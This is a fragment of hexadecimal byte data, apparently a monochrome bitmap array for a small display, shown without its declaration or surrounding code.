0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X00,0XFF,0XFF,0XFF,0X00,0X00,
0X7F,0XC0,0X00,0X00,0X00,0X01,0XFF,0X8F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,
0XFF,0XFF,0XFF,0XFF,0X81,0XFE,0X00,0X00,0X00,0X00,0XFE,0X00,0X00,0X7F,0XFF,0XFF,
0X80,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XE0,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XC0,0X00,
0X7F,0XE0,0X00,0X00,0X00,0X01,0XFF,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,
0XFF,0XFF,0XFF,0XFF,0X81,0XFE,0X00,0X00,0X00,0X00,0XFE,0X00,0X03,0XFF,0XFF,0XFF,
0XE0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X1F,0XFF,0XFF,0XFF,0XF0,0X00,
0X3F,0XE0,0X00,0X00,0X00,0X03,0XFF,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X01,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,
0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0X3F,0XFF,0XFF,0XFF,0XFC,0X00,
0X3F,0XF0,0X00,0X00,0X00,0X03,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X1F,0XFF,0XFF,0XFF,
0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,
0X1F,0XF0,0X00,0X00,0X00,0X07,0XFE,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0X7F,0XFF,0XFF,0XFF,
0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF7,0XFF,0XFF,0XC0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X00,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,
0X1F,0XF8,0X00,0X00,0X00,0X07,0XFC,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X00,0XFF,0XFF,0XFF,0XFF,
0XFF,0X80,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE7,0XFF,0XFF,0XE0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,
0X0F,0XF8,0X00,0X00,0X00,0X0F,0XFC,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XC0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC7,0XFF,0XFF,0XF0,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X03,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X0F,0XFC,0X00,0X00,0X00,0X0F,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X87,0XFF,0XFF,0XF8,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X07,0XFC,0X00,0X00,0X00,0X1F,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFC,0X00,0X00,0X00,0X00,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XE0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X07,0XFF,0XFF,0XFC,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,
0X07,0XFE,0X00,0X00,0X00,0X1F,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X1F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X03,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF0,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XFF,0XFE,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X07,0XFF,0XC0,0X00,0X01,0XFF,0XE0,
0X03,0XFE,0X00,0X00,0X00,0X3F,0XE0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF8,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XE0,0X00,0X01,
0XFF,0XF0,0X0F,0XE0,0X00,0X00,0X00,0X3F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X07,0XFF,0XFF,0XFE,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0X00,0X00,0X00,0X7F,0XF0,
0X03,0XFF,0X00,0X00,0X00,0X3F,0XE0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0X80,0X00,0X00,
0X7F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X07,0XFF,0XFF,0XFF,0X00,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFE,0X00,0X00,0X00,0X3F,0XF0,
0X01,0XFF,0X00,0X00,0X00,0X7F,0XC0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0X00,0X00,0X00,
0X1F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X07,0XFF,0XFF,0XFF,0X80,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFC,0X00,0X00,0X00,0X1F,0XF0,
0X01,0XFF,0X80,0X00,0X00,0X7F,0XC0,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XE0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFC,0X00,0X00,0X00,
0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF8,0X00,0X00,0X00,0X0F,0XF0,
0X00,0XFF,0X80,0X00,0X00,0XFF,0X80,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF0,
0X00,0X00,0X00,0X00,0X01,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFC,0X00,0X00,0X00,
0X0F,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X07,0XFF,0XFF,0XFF,0XC0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0XFF,0XC0,0X00,0X00,0XFF,0X80,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X1F,0XF8,
0X00,0X00,0X00,0X00,0X01,0XFE,0X00,0X00,0X00,0X01,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X07,0XFF,0XFF,0XFF,0XE0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0X7F,0XC0,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0X80,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X07,0XFF,0XFF,0XFF,0XE0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X7F,0XE0,0X00,0X01,0XFF,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X1F,0XFF,
0XFF,0XFF,0XFF,0XF0,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XF0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X3F,0XE0,0X00,0X03,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFC,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XF0,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X3F,0XF0,0X00,0X03,0XFE,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFE,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X1F,0XF0,0X00,0X07,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X0F,0XFF,
0XFF,0XFF,0XFF,0XFF,0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XF8,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X1F,0XF8,0X00,0X07,0XFC,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X07,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X0F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XF8,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X0F,0XF8,0X00,0X0F,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X03,0XFF,
0XFF,0XFF,0XFF,0XFF,0X81,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X1F,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XE0,0X00,0X00,0X00,0X07,0XF0,
0X00,0X07,0XFC,0X00,0X1F,0XF8,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0XFF,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF0,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFF,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X07,0XFF,0XFF,0XFF,0XFC,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XF0,0X00,0X00,0X00,0X0F,0XF0,
0X00,0X07,0XFC,0X00,0X1F,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X3F,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XF8,0X00,0X00,0X00,
0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFE,0X00,0X07,0XFF,0X80,0X7F,0XFE,0X00,0X07,0XF8,0X07,0XFF,0XFE,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X07,0XFE,0X00,0X3F,0XF0,0X00,0X0F,0XFF,0XFF,0XFF,0XFF,0XFC,0X00,0X00,0X01,
0XFF,0XFF,0XFF,0XFF,0XC1,0XFF,0XFF,0XFF,0XFF,0XFF,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0XFF,0XFF,0XFF,0XFF,0XC0,0X00,
0X01,0XFE,0X00,0X03,0XFF,0X00,0X3F,0XFE,0X00,0X07,0XF0,0X03,0XFF,0XFE,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X03,0XFE,0X00,0X3F,0XE0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0XFF,0XC1,0XFE,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFE,0X00,0X03,0XFE,0X00,0X3F,0XFC,0X00,0X27,0XF0,0X03,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X03,0XFF,0X00,0X7F,0XE0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X00,0X03,0XFE,0X00,0X3F,0XFC,0X00,0X3F,0XE0,0X01,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X01,0XFF,0X00,0X7F,0XC0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X3F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XE0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X00,0X01,0XFE,0X00,0X1F,0XF8,0X00,0X7F,0XE0,0X01,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0X80,0XFF,0XC0,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XC0,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X01,0XFC,0X00,0X1F,0XF8,0X00,0X7F,0XC0,0X00,0XFF,0XFF,0X00,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0X80,0XFF,0X80,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0X80,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X01,0XFC,0X00,0X0F,0XF0,0X00,0X7F,0XC0,0X00,0XFF,0XFF,0X80,0X03,
0XFC,0X00,0X00,0X03,0XFC,0X00,0X00,0X07,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFF,0XF0,
0X00,0X00,0XFF,0XC1,0XFF,0X80,0X00,0X0F,0XF8,0X00,0X00,0X00,0X00,0X00,0X00,0X00,
0X00,0X00,0X00,0X1F,0XC1,0XFC,0X00,0X00,0X00,0X00,0XFE,0X07,0XFF,0XFF,0XFF,0XFF,
0XFF,0XF8,0X0F,0XFF,0XFF,0XFF,0XFF,0XFE,0X00,0X7F,0X80,0X00,0X00,0X00,0X00,0X00,
0X01,0XFF,0X80,0X00,0XFC,0X00,0X0F,0XF0,0X00,0XFF,0XC0,0X00,0X7F,0XFF,0X80,0X03,
